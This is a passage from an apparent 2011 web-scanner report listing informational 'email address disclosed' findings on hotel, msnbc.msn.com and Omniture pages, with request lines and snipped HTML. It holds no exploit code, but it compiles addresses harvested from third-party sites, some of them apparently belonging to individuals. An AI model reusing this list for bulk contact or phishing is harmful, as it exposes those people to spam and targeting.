title="enquiry@grandcopthorne.com.sg">
...[SNIP]...

21.395. http://www.millenniumhotels.com.sg/mhotelsingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/mhotelsingapore/index.html

Issue detail

The following email address was disclosed in the response:

enquiry@m-hotel.com

Request

GET /mhotelsingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.396. http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/orchardhotelsingapore/index.html

Issue detail

The following email address was disclosed in the response:

enquiry@orchardhotel.com.sg

Request

GET /orchardhotelsingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.397. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032118/ns/technology_and_science

Issue detail

The following email address was disclosed in the response:

pnaskrecki@oeb.harvard.edu

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.398. http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41274431/ns/world_news-weird_news/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41274431/ns/world_news-weird_news/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.399. http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41292533/ns/technology_and_science-science/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

21.400. http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41299984/ns/health-cancer/from/toolbar

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

21.401. http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41354775/ns/business-business_of_super_bowl_xlv/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

21.402. http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41357424/ns/health-kids_and_parenting

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41357424/ns/health-kids_and_parenting HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.403. http://www.msnbc.msn.com/id/41359879/ns/us_news-life/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41359879/ns/us_news-life/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41359879/ns/us_news-life/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.404. http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41360579/ns/us_news-crime_and_courts

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41360579/ns/us_news-crime_and_courts HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.405. http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41362386/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41362386/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.406. http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41362578/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41362578/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.407. http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41363059/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41363059/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.408. http://www.msnbc.msn.com/id/41363738/ns/weather previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41363738/ns/weather

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41363738/ns/weather HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.409. http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41363935/ns/world_news-mideastn_africa/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Wed, 02 Feb 2011 16:03:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 204250

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

21.410. http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41364449/ns/world_news-the_new_york_times

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41364449/ns/world_news-the_new_york_times HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Wed, 02 Feb 2011 16:04:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 183067

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

21.411. http://www.msnbc.msn.com/id/41365053 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41365053

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41365053 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.412. http://www.msnbc.msn.com/id/41365053/ns/weather/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41365053/ns/weather/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41365053/ns/weather/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.413. http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41366134/ns/world_news-mideastn_africa

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41366134/ns/world_news-mideastn_africa HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.414. http://www.msnbc.msn.com/id/41367374/ns/world_news-europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41367374/ns/world_news-europe

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41367374/ns/world_news-europe HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.415. http://www.nolanfans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nolanfans.com
Path:	/

Issue detail

The following email address was disclosed in the response:

nolanfans@gmail.com

Request

GET / HTTP/1.1
Host: www.nolanfans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.416. http://www.omniture.com/en/education previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.417. http://www.omniture.com/en/education/academic_initiative previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/academic_initiative

Issue detail

The following email addresses were disclosed in the response:

akingsfo@adobe.com
ats@adobe.com
ats_emea@adobe.com

Request

Response

21.418. http://www.omniture.com/en/education/certification previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.419. http://www.omniture.com/en/education/certification/implementation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/implementation

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.420. http://www.omniture.com/en/education/certification/insight_analyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_analyst

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.421. http://www.omniture.com/en/education/certification/insight_architect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_architect

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.422. http://www.omniture.com/en/education/certification/search_center previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/search_center

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.423. http://www.omniture.com/en/education/certification/site_catalyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/site_catalyst

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.424. http://www.omniture.com/en/education/certification/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/support

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.425. http://www.omniture.com/en/education/certification/test_target previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/test_target

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.426. http://www.omniture.com/en/education/courses/discover previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/discover

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.427. http://www.omniture.com/en/education/courses/dop_analyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/dop_analyst

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:06:19 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:06:19 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:19 GMT; path=/; domain=omniture.com
Content-Length: 37572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Insight Training Courses | Web
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...

21.428. http://www.omniture.com/en/education/courses/merchandising previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/merchandising

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.429. http://www.omniture.com/en/education/courses/online_marketing_suite previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/online_marketing_suite

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:07:55 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:07:55 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:07:55 GMT
Content-Length: 31327
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:55 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Marketing Suite Training
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...

21.430. http://www.omniture.com/en/education/courses/sbu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sbu

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:06:11 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:06:11 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:11 GMT; path=/; domain=omniture.com
Content-Length: 48885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>SiteCatalyst Training Course |
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...
<a href="mailto:ats@adobe.com">ats@adobe.com</a>
...[SNIP]...
<a href="mailto:ats_emea@adobe.com">ats_emea@adobe.com</a>
...[SNIP]...

21.431. http://www.omniture.com/en/education/courses/searchcenter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/searchcenter

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
